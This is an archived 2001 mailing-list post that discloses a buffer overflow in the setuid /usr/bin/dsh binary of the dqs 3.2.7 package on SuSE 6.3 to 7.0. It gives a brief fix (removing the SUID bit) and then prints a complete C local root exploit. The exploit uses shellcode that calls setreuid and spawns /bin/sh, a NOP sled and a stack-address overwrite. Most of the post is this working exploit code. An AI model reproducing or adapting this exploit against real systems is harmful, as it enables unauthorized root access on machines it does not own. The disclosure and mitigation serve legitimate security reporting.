Subject: dqs 3.2.7 local root exploit. Hello. DESCRIPTION: I found a buffer overflow vunerability on the /usr/bin/dsh (dqs 3.2.7 package). I really don't know if this bug was discovered already. if thats right, then sorry =). If a long line on the first argument is gived, the program gives a SIGSEGV signal. This bug was reported to Drake Diedrich, Mantainer for dqs (Drake.Diedrichat_private). AFFECTED: SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default an then it are vunerable, maybe others. FIX: Remove the SUID permission |root@netdex /root|# ls -la /usr/bin/dsh -rwsr-xr-x 1 root root 502748 May 18 00:36 /usr/bin/dsh |root@netdex /root|# chmod -s /usr/bin/dsh |root@netdex /root|# ls -la /usr/bin/dsh -rwxr-xr-x 1 root root 502748 May 18 00:36 /usr/bin/dsh |root@netdex /root|# EXAMPLE EXPLOIT: You can found the exploit at www.raza-mexicana.org/programas/programas/qsexp.c And here it is: ----CUT HERE---- /* - dqsexp.c - */ /********************************************************************/ /* /usr/bin/dsh(dqs 3.2.7 package) local root exploit. */ /* SuSE 6.3, 6.4, and 7.0 are vunerable. */ /* dex@raza-mexicana.org <> http://www.raza-mexicana.org */ /* Saludos: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal, */ /* megaflop y a todo raza. que weba escribirlos todos XD. */ /* En especial saludos al espa~olete(NOP) :P, ya sabes porque. */ /* */ /* - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */ /********************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFFSIZE 2772 #define OFFSET 0 #define ALIGN 0 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } static char code[]= /* stolen from mount.c :P */ "\x29\xc0" /* subl %eax, %eax */ "\xb0\x46" /* movb $70, %al */ "\x29\xdb" /* subl %ebx, %ebx */ "\xb3\x0c" /* movb $12, %bl */ "\x80\xeb\x0c" /* subb $12, %bl */ "\x89\xd9" /* movl %ebx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xeb\x18" /* jmp callz */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xe3\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68"; void main(int argc, char **argv) { int i; unsigned long addr; char *buffer; int offset=OFFSET; int buffsize=BUFFSIZE; int align=ALIGN; if (argc > 1 ) offset = atoi(argv[1]); if (argc > 2 ) align = atoi(argv[2]); if (argc > 3 ) buffsize = atoi(argv[3]); buffer = (char *)malloc(buffsize + 8); addr = get_sp() - offset; for(i = 0; i < buffsize; i += 4) { *(long *)&buffer[i] = 0x90909090; } *(long *)&buffer[buffsize - 8] = addr; *(long *)&buffer[buffsize - 4] = addr; memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code)); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n"); printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n"); printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n"); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n"); printf("[*] Address=0x%x, Align=%d, Offset=%d\n", addr, align, offset); printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n"); printf("[*] Starting....\n"); execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL); } ----EOF---- ================================================= Mail: dex@raza-mexicana.org Page: http://www.raza-mexicana.org ===============================================
This archive was generated by hypermail 2b30 : Fri May 18 2001 - 19:41:48 PDT